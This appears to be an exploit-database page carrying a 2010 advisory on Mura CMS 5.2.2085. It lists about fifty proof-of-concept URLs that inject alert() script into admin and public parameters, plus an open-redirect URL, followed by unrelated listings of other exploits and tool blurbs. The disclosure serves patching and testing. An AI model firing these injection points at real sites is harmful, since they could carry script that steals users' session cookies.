Menu

Search for hundreds of thousands of exploits

"Mura CMS - Multiple Cross-Site Scripting Vulnerabilities"

Author

Exploit author

"Richard Brain"

Platform

Exploit platform

cfm

Release date

Exploit published date

2010-12-13

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
source: https://www.securityfocus.com/bid/45384/info

Mura CMS is prone to multiple cross-site-scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials; other attacks are also possible.

Mura CMS 5.2.2085 is vulnerable; other versions may also be affected. 

1. Cross-site scripting:

http://www.example.com/admin/index.cfm?email="><script>alert(1)</script>&fuseaction=cLogin.main&returnURL=1&status=sendlogin
http://www.example.com/default/error/index.cfm?error.diagnostics="><script>alert(1)</script>
http://www.example.com/admin/date_picker/dsp_dp_showmonth.cfm?+5=posn+1&dateLong="><script>alert(1)</script>
http://www.example.com/admin/date_picker/index.cfm?field="><script>alert(1)</script>
http://www.example.com/Admin/index.cfm?fuseaction=cLogin.main&returnURL=&status=sendlogin&email=<script>alert(1)</script>
http://www.example.com/admin/view/layouts/compact.cfm?fusebox.ajax="><script>alert(1)</script>&
http://www.example.com/admin/view/layouts/template.cfm?fusebox.ajax="><script>alert(1)</script>&myfusebox.originalcircuit=cLogin
http://www.example.com/admin/view/layouts/template.cfm?moduleTitle=</title><body><script>alert(1)</script>
http://www.example.com/admin/view/vAdvertising/dsp_editCreative.cfm?attributes.siteid="><script>alert(1)</script>
http://www.example.com/admin/view/vAdvertising/dsp_editIPWhiteList.cfm?attributes.siteid="><script>alert(1)</script>&
http://www.example.com/admin/view/vAdvertising/dsp_editPlacement.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vAdvertising/dsp_listAdZones.cfm?attributes.keywords="><script>alert(1)</script>
http://www.example.com/admin/view/vAdvertising/dsp_listAdvertisers.cfm?attributes.keywords="><script>alert(1)</script>
http://www.example.com/admin/view/vAdvertising/dsp_listCampaigns.cfm?attributes.keywords="><script>alert(1)</script>
http://www.example.com/admin/view/vAdvertising/dsp_listCreatives.cfm?attributes.keywords="><script>alert(1)</script>
http://www.example.com/admin/view/vAdvertising/dsp_viewReportByCampaign.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vAdvertising/dsp_viewReportByPlacement.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vArchitecture/form/dsp_tab_related_content.cfm?attributes.siteid="><script>alert(1)</script>&session.rb=default
http://www.example.com/admin/view/vDashboard/dsp_sessionSearch.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vDashboard/dsp_topContent.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vDashboard/dsp_topRated.cfm?session.dateKey=application.contentManager.getCrumbListrsList.contentid,<script>alert(1)</script>
http://www.example.com/admin/view/vDashboard/dsp_topReferers.cfm?session.dateKey=application.contentManager.getCrumbListrsList.contentid,<script>alert(1)</script>
http://www.example.com/admin/view/vDashboard/dsp_topSearches.cfm?session.dateKey=application.contentManager.getCrumbListrsList.contentid,<script>alert(1)</script>
http://www.example.com/admin/view/vEmail_Broadcaster/dsp_form.cfm?session.dateKey=<script>alert(1)
</script>
http://www.example.com/admin/view/vEmail_Broadcaster/dsp_list.cfm?session.dateKey=<script>alert(1)
</script>
http://www.example.com/admin/view/vExtend/dsp_attribute_form.cfm?attributes.formName=TextBox,TextArea,HTMLEditor,SelectBox,MultiSelectBox,RadioGroup,File,Hidden/"><script>alert(1)
</script>&attributes.action=TextBox,TextArea,HTMLEditor,SelectBox,MultiSelectBox,RadioGroup,File,Hi
dden
http://www.example.com/admin/view/vExtend/dsp_editAttributes.cfm?attributes.extendSetID="><script>alert(1)</script>&attributes.subTypeID=extendSetssattributes.siteid=attributesArraya
http://www.example.com/admin/view/vExtend/dsp_listSets.cfm?attributes.siteid="><script>alert(1)</script>&attributes.subTypeID=extendSetss
http://www.example.com/admin/view/vExtend/dsp_listSubTypes.cfm?attributes.siteid="><script>alert(1)</script>
http://www.example.com/admin/view/vFeed/ajax/dsp_loadSite_old.cfm?attributes.siteid="><script>alert(1)</script>
http://www.example.com/admin/view/vFeed/dsp_list.cfm?attributes.siteid="><script>alert(1)</script>
http://www.example.com/admin/view/vMailingList/dsp_form.cfm?attributes.mlid=1&attributes.siteid="><script>alert(1)</script>
http://www.example.com/admin/view/vMailingList/dsp_list_members.cfm?attributes.siteid="><script>alert(1)
</script>
http://www.example.com/admin/view/vPrivateUsers/dsp_group.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vPrivateUsers/dsp_secondary_menu.cfm?attributes.siteid="><script>alert(1)</script>
http://www.example.com/admin/view/vPrivateUsers/dsp_user.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vPrivateUsers/dsp_userprofile.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vPublicUsers/dsp_group.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vPublicUsers/dsp_user.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vSettings/dsp_plugin_form.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/default/includes/display_objects/calendar/dsp_dp_showmonth.cfm?dateLong="><script>alert(1)</script>
http://www.example.com/default/includes/display_objects/custom/fuseboxtemplates/noxml/view/layout/lay_template.cfm?body="><script>alert(1)</script>
http://www.example.com/default/includes/display_objects/custom/fuseboxtemplates/xml/view/display/dsp_hello.cfm?runTime="><script>alert(1)</script>
http://www.example.com/default/includes/display_objects/custom/fuseboxtemplates/xml/view/layout/lay_template.cfm?body="><script>alert(1)</script>
http://www.example.com/default/includes/email/inc_email.cfm?bodyHtml=<script>alert(1)</script>&forward=1&rsEmail.site=pcutest@procheckup.com&
http://www.example.com/default/includes/email/inc_email.cfm?rsEmail.site=</title><body><script>alert(1)</script>
http://www.example.com/default/includes/themes/merced/templates/inc/header.cfm?request.siteid="><script>alert(1)</script>
http://www.example.com/default/includes/themes/merced/templates/inc/ie_conditional_includes.cfm?event.getSite.getAssetPath=1&themePath="><script>alert(1)</script>
http://www.example.com/default/utilities/sendtofriend.cfm?request.siteID=Default&url.link="><script>alert(1)</script>http://www.procheckup.com
http://www.example.com/requirements/mura/geoCoding/index.cfm?
http://www.example.com/wysiwyg/editor/plugins/selectlink/fck_selectlink.cfm?fuseaction=cArch.search&keywords="><script>alert(1)</script>&session.siteid=default

2) URI redirection:

http://www.example.com/admin/index.cfm?fuseaction=cLogin.main&display=login&status=failed&rememberMe=1&contentid=&LinkServID=&returnURL=http://www.example.com
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-09-16 "Symantec Advanced Secure Gateway (ASG) / ProxySG - Unrestricted File Upload" webapps cfm "Pankaj Kumar Thakur"
2017-10-24 "Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection" webapps cfm "Anthony Cole"
2015-04-21 "BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion" webapps cfm Portcullis
2011-09-27 "Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities" webapps cfm MustLive
2011-08-18 "Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting" webapps cfm G.R0b1n
2011-02-24 "Alcassoft's SOPHIA CMS - SQL Injection" webapps cfm p0pc0rn
2011-02-15 "Lingxia I.C.E CMS - Blind SQL Injection" webapps cfm mr_me
2011-01-25 "ActiveWeb Professional 3.0 - Arbitrary File Upload" webapps cfm StenoPlasma
2010-12-13 "Mura CMS - Multiple Cross-Site Scripting Vulnerabilities" webapps cfm "Richard Brain"
2010-11-24 "ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)" webapps cfm Metasploit
Release Date Title Type Platform Author
2011-10-18 "Check Point UTM-1 Edge and Safe 8.2.43 - Multiple Vulnerabilities" remote hardware "Richard Brain"
2011-05-16 "Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities" webapps asp "Richard Brain"
2011-05-09 "Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities" webapps asp "Richard Brain"
2011-05-05 "BMC Dashboards 7.6.01 - Cross-Site Scripting / Information Disclosure" webapps jsp "Richard Brain"
2011-05-05 "BMC Remedy Knowledge Management 7.5.00 - Default Account / Multiple Cross-Site Scripting Vulnerabilities" webapps jsp "Richard Brain"
2010-12-21 "WordPress Plugin Mediatricks Viva Thumbs - Multiple Information Disclosure Vulnerabilities" webapps php "Richard Brain"
2010-12-15 "HP Insight Diagnostics Online Edition 8.4 - 'search.php' Cross-Site Scripting" webapps php "Richard Brain"
2010-12-14 "BlogCFC 5.9.6.001 - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Richard Brain"
2010-12-13 "Mura CMS - Multiple Cross-Site Scripting Vulnerabilities" webapps cfm "Richard Brain"
2010-12-03 "DotNetNuke 5.5.1 - 'InstallWizard.aspx' Cross-Site Scripting" webapps asp "Richard Brain"
2010-06-09 "Juniper Networks SA2000 SSL VPN Appliance - 'welcome.cgi' Cross-Site Scripting" remote hardware "Richard Brain"
2010-05-21 "Apache Axis2 Administration Console - (Authenticated) Cross-Site Scripting" webapps multiple "Richard Brain"
2010-05-21 "3Com* iMC (Intelligent Management Center) - Traversal File Retrieval" webapps windows "Richard Brain"
2010-05-21 "3Com* iMC (Intelligent Management Center) - Cross-Site Scripting / Information Disclosure Flaws" webapps windows "Richard Brain"
2010-01-28 "CommonSpot Server - '/utilities/longproc.cfm' Cross-Site Scripting" webapps cfm "Richard Brain"
2010-01-27 "SAP BusinessObjects 12 - URI redirection / Cross-Site Scripting" remote multiple "Richard Brain"
2010-01-27 "HP System Management Homepage 3.0.2 - 'servercert' Cross-Site Scripting" remote multiple "Richard Brain"
2009-09-25 "Activedition - '/activedition/aelogin.asp' Multiple Cross-Site Scripting Vulnerabilities" webapps asp "Richard Brain"
2008-11-11 "Sun Java System Identity Manager 6.0/7.x - Multiple Vulnerabilities" webapps jsp "Richard Brain"
2008-04-23 "RSA Authentication Agent for Web 5.3 - Open Redirection" remote windows "Richard Brain"
2008-02-28 "Juniper Networks Secure Access 2000 Web - Root Full Path Disclosure" webapps cgi "Richard Brain"
2008-02-28 "Juniper Networks Secure Access 2000 - 'rdremediate.cgi' Cross-Site Scripting" remote hardware "Richard Brain"
2007-11-30 "F5 Networks FirePass 4100 SSL VPN - 'My.Logon.php3' Cross-Site Scripting" remote hardware "Richard Brain"
2007-08-30 "Absolute Poll Manager XE 4.1 - 'xlaapmview.asp' Cross-Site Scripting" webapps asp "Richard Brain"
2007-02-19 "Spyce 2.1.3 - 'spyce/examples/request.spy?name' Cross-Site Scripting" webapps php "Richard Brain"
2007-02-19 "Spyce 2.1.3 - 'spyce/examples/getpost.spy?Name' Cross-Site Scripting" webapps php "Richard Brain"
2007-02-19 "Spyce 2.1.3 - spyce/examples/automaton.spy Direct Request Error Message Information Disclosure" webapps php "Richard Brain"
2007-02-19 "Spyce 2.1.3 - '/docs/examples/redirect.spy' Multiple Cross-Site Scripting Vulnerabilities" webapps php "Richard Brain"
2007-02-19 "Spyce 2.1.3 - 'docs/examples/handlervalidate.spy?x' Cross-Site Scripting" webapps php "Richard Brain"
2007-02-19 "Spyce 2.1.3 - '/spyce/examples/formtag.spy' Multiple Cross-Site Scripting Vulnerabilities" webapps php "Richard Brain" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected